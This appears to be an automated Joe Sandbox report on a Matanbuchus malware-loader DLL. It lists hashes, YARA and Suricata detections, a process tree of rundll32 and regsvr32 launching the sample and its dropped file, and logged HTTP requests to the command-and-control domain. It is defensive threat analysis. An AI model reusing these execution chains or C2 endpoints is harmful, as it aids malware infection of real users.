Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.dll

Overview

General Information

Sample name:file.dll
Analysis ID:1592430
MD5:04089eb8f941dee4f0fbbfec314718d8
SHA1:ce07c536f70af194a363f2c1a81d99680562c4a2
SHA256:96678cacc0550c86d40b54672c15d1d3e35743fddf3c2235c21ff636d4a8961d
Tags:dllinit-moduleMatanbuchususer-Bitsight
Infos:

Detection

Matanbuchus
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Matanbuchus
AI detected suspicious sample
Found evasive API chain (may stop execution after checking mutex)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Network Connection Initiated By Regsvr32.EXE
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 4052 cmdline: loaddll32.exe "C:\Users\user\Desktop\file.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 1132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 2528 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\file.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 2800 cmdline: rundll32.exe "C:\Users\user\Desktop\file.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 6932 cmdline: rundll32.exe C:\Users\user\Desktop\file.dll,DllInstall MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 1804 cmdline: rundll32.exe C:\Users\user\Desktop\file.dll,Export MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 5696 cmdline: rundll32.exe C:\Users\user\Desktop\file.dll,Main MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7036 cmdline: rundll32.exe "C:\Users\user\Desktop\file.dll",DllInstall MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7044 cmdline: rundll32.exe "C:\Users\user\Desktop\file.dll",Export MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 4900 cmdline: rundll32.exe "C:\Users\user\Desktop\file.dll",Main MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 2912 cmdline: rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_setopt MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 4600 cmdline: rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_perform MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 4328 cmdline: rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_init MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 4032 cmdline: rundll32.exe "C:\Users\user\Desktop\file.dll",curl_easy_cleanup MD5: 889B99C52A60DD49227C5E485A016679)
      • WerFault.exe (PID: 3220 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4032 -s 624 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • rundll32.exe (PID: 5972 cmdline: rundll32.exe "C:\Users\user\Desktop\file.dll",UnregisterDll MD5: 889B99C52A60DD49227C5E485A016679)
  • regsvr32.exe (PID: 1912 cmdline: C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.winmd" "C:\Users\user\8f08\user-PC\user-PC.winmd" MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
    • regsvr32.exe (PID: 6744 cmdline: -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.winmd" "C:\Users\user\8f08\user-PC\user-PC.winmd" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
  • regsvr32.exe (PID: 5036 cmdline: C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.winmd" "C:\Users\user\8f08\user-PC\user-PC.winmd" MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
    • regsvr32.exe (PID: 4980 cmdline: -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.winmd" "C:\Users\user\8f08\user-PC\user-PC.winmd" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
  • regsvr32.exe (PID: 6984 cmdline: C:\Windows\System32\regsvr32.exe -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.winmd" "C:\Users\user\8f08\user-PC\user-PC.winmd" MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
    • regsvr32.exe (PID: 5688 cmdline: -e -n -i:"C:\Users\user\8f08\user-PC\user-PC.winmd" "C:\Users\user\8f08\user-PC\user-PC.winmd" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
MatanbuchusAccording to PCrisk, Matanbuchus is a loader-type malicious program offered by its developers as Malware-as-a-Service (MaaS). This piece of software is designed to cause chain infections.Since it is used as a MaaS, both the malware it infiltrates into systems, and the attack reasons can vary - depending on the cyber criminals operating it. Matanbuchus has been observed being used in attacks against US universities and high schools, as well as a Belgian high-tech organization.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.matanbuchus

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
file.dllJoeSecurity_MatanbuchusYara detected MatanbuchusJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\8f08\user-PC\user-PC.winmdJoeSecurity_MatanbuchusYara detected MatanbuchusJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000009.00000002.2233819943.000000007F020000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_MatanbuchusYara detected MatanbuchusJoe Security
        00000009.00000002.2233819943.000000007F020000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Matanbuchus_4ce9affbunknownunknown
        • 0x210e5:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B
        • 0x23715:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B
        00000009.00000002.2233819943.000000007F020000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Matanbuchus_58a61aaaunknownunknown
        • 0x33490:$a1: 55 8B EC 83 EC 08 53 56 0F 57 C0 66 0F 13 45 F8 EB 12 8B 45 F8 83 C0 01 8B 4D FC 83 D1 00 89 45 F8 89 4D FC 8B 55 FC 3B 55
        0000000B.00000002.2258768567.000000007FC30000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_MatanbuchusYara detected MatanbuchusJoe Security
          0000000B.00000002.2258768567.000000007FC30000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Matanbuchus_4ce9affbunknownunknown
          • 0x210e5:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B
          • 0x23715:$a1: F4 83 7D F4 00 77 43 72 06 83 7D F0 11 73 3B 6A 00 6A 01 8B
          Click to see the 21 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          29.2.regsvr32.exe.6c3f0000.0.unpackJoeSecurity_MatanbuchusYara detected MatanbuchusJoe Security
            9.2.regsvr32.exe.6c3d0000.0.unpackJoeSecurity_MatanbuchusYara detected MatanbuchusJoe Security
              3.2.rundll32.exe.6cc50000.1.unpackJoeSecurity_MatanbuchusYara detected MatanbuchusJoe Security
                5.2.rundll32.exe.6cc50000.0.unpackJoeSecurity_MatanbuchusYara detected MatanbuchusJoe Security
                  11.2.rundll32.exe.6cc50000.0.unpackJoeSecurity_MatanbuchusYara detected MatanbuchusJoe Security
                    Click to see the 34 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Network Connection Initiated By Regsvr32.EXE
                    Source: Network ConnectionAuthor: Dmitriy Lifanov, oscd.community: Data: DestinationIp: 94.159.113.213, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\regsvr32.exe, Initiated: true, ProcessId: 6744, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49713

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-16T06:02:04.291204+010020344681Malware Command and Control Activity Detected192.168.2.64971494.159.113.213443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-16T06:02:00.600788+010028033043Unknown Traffic192.168.2.64971094.159.113.213443TCP
                    2025-01-16T06:02:00.664846+010028033043Unknown Traffic192.168.2.64970994.159.113.213443TCP
                    2025-01-16T06:02:02.561415+010028033043Unknown Traffic192.168.2.64971294.159.113.213443TCP
                    2025-01-16T06:02:03.975767+010028033043Unknown Traffic192.168.2.64971394.159.113.213443TCP
                    2025-01-16T06:02:08.504894+010028033043Unknown Traffic192.168.2.64973394.159.113.213443TCP
                    2025-01-16T06:03:03.710922+010028033043Unknown Traffic192.168.2.66442694.159.113.213443TCP
                    2025-01-16T06:04:03.721325+010028033043Unknown Traffic192.168.2.66447494.159.113.213443TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus detection for URL or domain
                    Source: https://corepatchcraft.com/updates/system-components/2025-release/updates_api.php:Avira URL Cloud: Label: malware
                    Source: https://corepatchcraft.com/XHAvira URL Cloud: Label: malware
                    Source: https://corepatchcraft.com/kernel2.aspxAvira URL Cloud: Label: malware
                    Source: https://corepatchcraft.com/libraries_v2Avira URL Cloud: Label: malware
                    Source: https://corepatchcraft.com/lowedCert_AutoUpdate_1Avira URL Cloud: Label: malware
                    Source: https://corepatchcraft.com/Avira URL Cloud: Label: malware
                    Source: https://corepatchcraft.com/updates/system-components/2025-release/updates_api.php9FPP/BAvira URL Cloud: Label: malware
                    Source: https://corepatchcraft.com/OeGcAvira URL Cloud: Label: malware
                    Source: https://corepatchcraft.com/updates/system-components/2025-release/updates_api.phpAvira URL Cloud: Label: malware
                    Source: https://corepatchcraft.com/pdates/system-components/2025-release/updates_api.php(/Avira URL Cloud: Label: malware
                    Source: https://corepatchcraft.com/pdates/system-components/2025-release/updates_api.phpssionKeyBackwardAvira URL Cloud: Label: malware
                    Multi AV Scanner detection for submitted file
                    Source: file.dllVirustotal: Detection: 13%Perma Link
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: file.dllStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE, DLL
                    Source: unknownHTTPS traffic detected: 94.159.113.213:443 -> 192.168.2.6:49710 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 94.159.113.213:443 -> 192.168.2.6:49709 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 94.159.113.213:443 -> 192.168.2.6:49713 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 94.159.113.213:443 -> 192.168.2.6:49733 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 94.159.113.213:443 -> 192.168.2.6:64426 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 94.159.113.213:443 -> 192.168.2.6:64474 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 94.159.113.213:443 -> 192.168.2.6:64474 version: TLS 1.2
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_7EF64932 FindFirstFileExW,3_2_7EF64932
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAD4932 FindFirstFileExW,5_2_7FAD4932
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_7F094932 FindFirstFileExW,9_2_7F094932

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2034468 - Severity 1 - ET MALWARE Matanbuchus Loader CnC M3 : 192.168.2.6:49714 -> 94.159.113.213:443
                    System process connects to network (likely due to code injection or exploit)
                    Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 94.159.113.213 443
                    Source: global trafficTCP traffic: 192.168.2.6:60834 -> 1.1.1.1:53
                    Source: global trafficTCP traffic: 192.168.2.6:64270 -> 162.159.36.2:53
                    Source: global trafficHTTP traffic detected: GET /kernel2.aspx HTTP/1.1Host: corepatchcraft.comCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /libraries_v2 HTTP/1.1Host: corepatchcraft.comCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /kernel2.aspx HTTP/1.1Host: corepatchcraft.comCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /kernel2.aspx HTTP/1.1Host: corepatchcraft.comCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /kernel2.aspx HTTP/1.1Host: corepatchcraft.comCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /kernel2.aspx HTTP/1.1Host: corepatchcraft.comCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /kernel2.aspx HTTP/1.1Host: corepatchcraft.comCache-Control: no-cache
                    Source: Joe Sandbox ViewASN Name: NETCOM-R-ASRU NETCOM-R-ASRU
                    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                    Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49709 -> 94.159.113.213:443
                    Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49710 -> 94.159.113.213:443
                    Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49712 -> 94.159.113.213:443
                    Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49713 -> 94.159.113.213:443
                    Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49733 -> 94.159.113.213:443
                    Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:64426 -> 94.159.113.213:443
                    Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:64474 -> 94.159.113.213:443
                    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                    Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_7FAB1890 HttpSendRequestA,InternetReadFile,InternetCloseHandle,std::ios_base::_Ios_base_dtor,std::ios_base::_Ios_base_dtor,5_2_7FAB1890
                    Source: global trafficHTTP traffic detected: GET /kernel2.aspx HTTP/1.1Host: corepatchcraft.comCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /libraries_v2 HTTP/1.1Host: corepatchcraft.comCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /kernel2.aspx HTTP/1.1Host: corepatchcraft.comCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /kernel2.aspx HTTP/1.1Host: corepatchcraft.comCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /kernel2.aspx HTTP/1.1Host: corepatchcraft.comCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /kernel2.aspx HTTP/1.1Host: corepatchcraft.comCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /kernel2.aspx HTTP/1.1Host: corepatchcraft.comCache-Control: no-cache
                    Source: global trafficDNS traffic detected: DNS query: corepatchcraft.com
                    Source: global trafficDNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa
                    Source: unknownHTTP traffic detected: POST /updates/system-components/2025-release/updates_api.php HTTP/1.1User-Agent: Microsoft-WNS/10.0Content-Type: application/x-www-form-urlencodedAccept-Language: fr-CAHost: corepatchcraft.comContent-Length: 585Cache-Control: no-cache
                    Source: rundll32.exe, 00000005.00000003.2581442397.0000000002C23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://corepatchcraft.com/
                    Source: rundll32.exe, 00000005.00000003.2581442397.0000000002C23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://corepatchcraft.com/OeGc
                    Source: rundll32.exe, 00000005.00000003.2581442397.0000000002C23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://corepatchcraft.com/XH
                    Source: rundll32.exe, 00000005.00000003.2581442397.0000000002C23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://corepatchcraft.com/lowedCert_AutoUpdate_1
                    Source: rundll32.exe, 00000005.00000003.2581442397.0000000002C23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://corepatchcraft.com/pdates/system-components/2025-release/updates_api.php(/
                    Source: rundll32.exe, 00000005.00000003.2581442397.0000000002C23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://corepatchcraft.com/pdates/system-components/2025-release/updates_api.phpssionKeyBackward
                    Source: rundll32.exe, 00000005.00000003.2581442397.0000000002C23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://corepatchcraft.com/updates/system-components/2025-release/updates_api.php
                    Source: rundll32.exe, 00000005.00000003.2581442397.0000000002C23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://corepatchcraft.com/updates/system-components/2025-release/updates_api.php9FPP/B
                    Source: rundll32.exe, 00000005.00000003.2581442397.0000000002C23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://corepatchcraft.com/updates/system-components/2025-release/updates_api.php:
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60873 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64427 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64460
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64462
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64340
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64461
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60896 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64462 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64382 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64453
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64331
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64452
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64455
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64454
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64457
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64456
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64459
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60896
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64458
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64451 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64350
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64471
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64470
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64473
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64468 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64422 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64416 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64464
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64463
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64466
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64433 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64465
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64468
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64467
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64469
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64360
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64290 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64421 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64444 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64438 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64475
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64474
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64474 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64457 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64371
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64279 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64449 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64463 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64410 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64475 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64452 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60905 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64469 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60911 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64417
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64416
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64419
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64418
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64410
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64432 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60854
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64426 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64443 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60839 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64464 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64331 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64428
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64427
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64429
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64420
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64422
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64421
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64423
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60864
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64426
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64437 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64458 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64425
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64425 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64440
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64448 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60873
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64439
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64438
                    Source: unknownNetwork traffic detected: HTTP traffic on port 60880 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64431
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64419 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64430
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64470 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64433
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64311
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64432
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64435
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64321 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64434
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64453 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64437
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64436
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64451
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64450
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64420 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64371 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64449
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60880
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64321
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64442
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64441
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64431 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64444
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60888
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64445
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64360 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64448
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64299 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64442 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64465 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64299
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64459 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64436 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64430 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64401 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 64454 -> 443
